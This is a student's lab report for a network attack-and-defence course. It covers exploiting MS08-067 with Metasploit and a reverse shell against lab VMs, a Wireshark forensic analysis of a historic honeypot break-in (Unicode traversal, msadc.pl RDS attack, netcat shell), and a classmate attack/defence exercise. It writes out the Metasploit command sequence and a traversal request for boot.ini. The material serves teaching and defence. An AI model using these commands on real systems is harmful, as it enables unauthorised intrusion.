目录
20232831袁思承 2023-2024-2 《网络攻防实践》第6次作业
1.实验内容
(1)动手实践Metasploit windows attacker
任务:使用metasploit软件进行windows远程渗透统计实验
具体任务内容:使用windows Attacker/Kali攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
(2)取证分析实践:解码一次成功的NT系统破解攻击
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net),要求提取并分析攻击的全部过程。并回答以下问题:
1、攻击者使用了什么破解工具进行攻击?
2、攻击者如何使用这个破解工具进入并控制了系统?
3、攻击者获得系统访问权限后做了什么?
4、我们如何防止这样的攻击?
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
(3)团队对抗实践:windows系统远程渗透攻击和分析
攻方使用metasploit选择漏洞进行攻击,获得控制权。(要求写出攻击方的同学信息、使用漏洞、相关IP地址等)
防守方使用wireshark监听获得的网络数据包,分析攻击过程,获取相关信息。
2.实验过程
(1)动手实践Metasploit windows attacker
| 虚拟机名称 | IP地址 |
|---|---|
| Kali-Linux攻击机 | 192.168.200.4 |
| Win2kServer_SP0_target靶机 | 192.168.200.124 |
检查一下攻击机与靶机之间的连通性如下:
首先,在Kali虚拟机中使用命令进入到Metasploit
msfconsole
输入以下命令调用MS08-067漏洞以实现相关的攻击,从而利用MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
use exploit/windows/smb/ms08_067_netapi
输入以下命令显示可用的攻击负载
show payloads
选择以下攻击负载以实现反向连接
set payload generic/shell_reverse_tcp
设置远程渗透攻击的相关信息,即设置攻击目标IP,设置本机IP,再使用show options查看设置的信息:
set RHOST 192.168.200.124
set LHOST 192.168.200.4
show options
输入以下命令进行攻击
exploit
攻击成功,进入对方的主机,利用以下命令进行靶机的ip查看
ipconfig
创建一个文件夹
mkdir ysc
从wireshark中可以查看这次攻击
成功获取目标主机的访问权!
(2)取证分析实践:解码一次成功的NT系统破解攻击
本处实验需要回答以下5个问题:
1、攻击者使用了什么破解工具进行攻击?
2、攻击者如何使用这个破解工具进入并控制了系统?
3、攻击者获得系统访问权限后做了什么?
4、我们如何防止这样的攻击?
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
首先,下载好snort-0204@0117.log文件后,在Kali中使用wireshark将其打开
整体查看文件该日志后,可以发现双方IP地址分别为213.116.251.162和172.16.1.106,且存在大量的HTTP、TCP流,以及少量的FTP流。通过简单查看后,不难发现213.116.251.162为攻击者,172.16.1.106为靶机。(当然实验本身也已经说明…)
首先,使用以下命令为筛选条件来依次查看HTTP流
ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106 && http
跟踪TCP流能发现,攻击者在SESSION:1765-80中成功进行了Unicode攻击以打开NT系统启动文件boot.ini,其request为:GET /guest/default,asp/…%C0%AF./…%C0%AF…1…%C0%AF…/boot.ini HTTP/1.1。因此可以推测存在UNICODE编码漏洞攻击。
在接下来的TCP中可以发现,攻击者探测了/msadc/msadcs.dll的存在,并在SESSION:1771-80中通过msadcs.d中存在RDS漏洞,即MS02-065 。此后,他进行了SQL注入,获取了权限。根据“ADM!ROX!YOURIWORLD”特征字符串,以及查询语中使用了dbg=c:\winnt\help\iis\htmtutorial\btcustmr.mdb,通过上网查询,可以得知这次攻击是由rain forest puppy 编写的 msadc(2).pl 渗透攻击代码所发起的,攻击者从此获取并成功进入了shell。至此,攻击者通过查点确认了目标系统提供Web服务的是ⅡSv4.0,并存在Unicode 和 MDAC RDS 安全漏洞,可进行进一步渗透攻击。
攻击者通过蜜网主机下载了所指定的一些文件,并通过 nc构建其一个远程 shell 通道。此后,攻击者连接 6969 端口,获得了访问权,并进入了交互式控制阶段。
攻击者看试查看文件:
删除了ftpcom文件
尝试获取密码,以及后续查看本地用户、用户组、管理员账户等等
删除SAM数据库中的数据(拷贝和删除har.txt),以提升权限。
尝试获取管理员administrator权限
通过以下内容可知攻击者发现攻击目标为蜜罐主机
接下来依次回答问题:
1、攻击者使用了什么破解工具进行攻击?
攻击者通过IIS Unicode漏洞,使用了Unicode攻击(针对MS00-078/MS01-026),还利用针对msadcs.dll中RDS漏洞(MS02-065)的msadc.pl/msadc2.pl 渗透攻击工具进行了攻击。
2、攻击者如何使用这个破解工具进入并控制了系统?
攻击者利用Unicode攻击和针对msadcs.dll中RDS漏洞的渗透攻击工具,成功进入了Shell,并获取权限从而控制了系统。通过Unicode攻击了解了被攻击主机操作系统的一些基本情况,发现无法成功获取系统访问权限后,再利用RDS漏洞进行了SQL注入攻击,最终获取了系统访问权限,并给自己创建了一个高权限的用户,达到控制系统的目的。
3、攻击者获得系统访问权限后做了什么?
攻击者获取了系统权限后,仍然尝试获取本地administrator的权限,因此他进行了各种尝试,试图通过删除SAM数据库中的数据(拷贝和删除har.txt)和将自己加到管理员组中的方式来实现提升自己访问权限的目的。
4、我们如何防止这样的攻击?
1、加强口令策略,包括定期更换口令、设置复杂度要求等,以防止口令被猜解或破解。
2、及时安装系统补丁和更新,以修补已知漏洞,减少攻击面。
3、使用入侵检测系统(IDS)和入侵防御系统(IPS)监控和阻止潜在的恶意流量和行为。
4、部署网络防火墙和访问控制列表(ACL)限制外部对系统的访问。
5、定期审计系统日志,及时发现异常行为并采取相应的应对措施。
6、禁用一些平时不用的服务例如RDS。
7、使用IS Lockdown和URLScan等工具加强 web server
5、你觉得攻击者是否警觉了他的目标是一台蜜罐主机?如果是,为什么?
是的,因为最后攻击者创建了rfp.txt文件并向文件中输入了以下内容,即“我到这才发现了这是蜜罐主机(笑脸)”。因为该目标主机作为rfp的个人网站,Wcb服务所使用的ⅡS甚至没有更新mp自己所发现的 MDAC RDS 安全漏洞,很容易让攻击者意识到这绝对是台诱饵。
C:>echo best honeypot i’ve seen till now : )
(3)团队对抗实践:windows系统远程渗透攻击和分析
①攻击实践
| 虚拟机名称 | IP地址 |
|---|---|
| Kali-Linux攻击机(袁思承) | 192.168.126.201 |
| Win2kServer_SP0_target靶机 (祝浩宣) | 192.168.126.141 |
这部分,为了实现在同一网段下,必须得将二者均采用桥接模式或者将Vmnet0设置为桥接模式(注意,由于均是笔记本连接wifi做实验,必须得将桥接的网卡设置为无线网卡,这里是Intel®Wireless-Ac 9560 160MHz,否则将连接不上外界主机网络,导致实验双方不能在同一网段)
即攻防双方设置Kali-Linux攻击机和Win2kServer_SP0_target靶机均在桥接模式下。
首先,查看自己的Kali攻击机的IP为:
192.168.126.201
ping对方的靶机如下:
192.168.126.141
根据上述(1)中的实验过程,对该IP地址的Win2kServer_SP0_target靶机进行攻击,首先使用以下命令打开Metasploit
msfconsole
输入以下命令调用MS08-067漏洞以实现相关的攻击,从而利用MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权
use exploit/windows/smb/ms08_067_netapi
输入以下命令显示可用的攻击负载
show payloads
选择以下攻击负载以实现反向连接
set payload generic/shell_reverse_tcp
设置远程渗透攻击的相关信息,即设置攻击目标IP,设置本机IP,再使用show options查看设置的信息:
set RHOST 192.168.126.141
set LHOST 192.168.126.201
show options
输入以下命令进行攻击
exploit
攻击成功,进入对方的主机,利用以下命令进行对方ip的查看,成功获取
ipconfig
使用以下命令在对方主机中创建文件夹并进入文件夹
mkdir yuansichengiscoming!
cd yuansichengiscoming!
查看对方的主机,能够看见已经成功创建该文件夹:
②防御实践
| 虚拟机名称 | IP地址 |
|---|---|
| Kali-Linux攻击机(祝浩宣) | 192.168.126.125 |
| Win2kServer_SP0_target靶机 (袁思承) | 192.168.126.79 |
首先,将靶机设置为Vmnet0网段的桥接模式:
然而,即使设置为了桥接模式,仍然无法联网,会出现例如IP与同网段中的IP出现冲突,导致ip地址为0.0.0.0的情况,又或者是直接没有网络等等问题。通过寻找方法,需要将靶机的IP地址改为自动获取才可以使得攻防双方拥有同一网段的IP。
自动获取IP后,能自动分配到以下ip
192.168.126.79
首先检查攻防双方是否能够互联,使用ping指令进行检测,发现能够ping通:
ping 192.168.126.125
被对方攻击后,首先发现自己的主机中多了对方创建的文件夹zhuhaoxuan
使用wireshark抓包能够发现对方的TCP流以及各类操作:
跟踪TCP流发现,对方入侵我的主机以后使用了以下命令:
3.学习中遇到的问题及解决
- 问题:Win2k直连后无法上网,或者出现IP为0.0.0.0的情况
- 问题解决方案:将Win2k改为随机获取IP地址,而不是使用指定IP地址
4.学习感悟、思考等
通过本次实验,我学习了如何使用msfconsole工具进行对靶机的漏洞攻击,同时分析了一次成功的NT系统破解攻击,最后与同学进行了攻防实战演练,加深了我对Windows系统远程渗透攻击的理解,并学习了解了防范和应对漏洞攻击的方法。
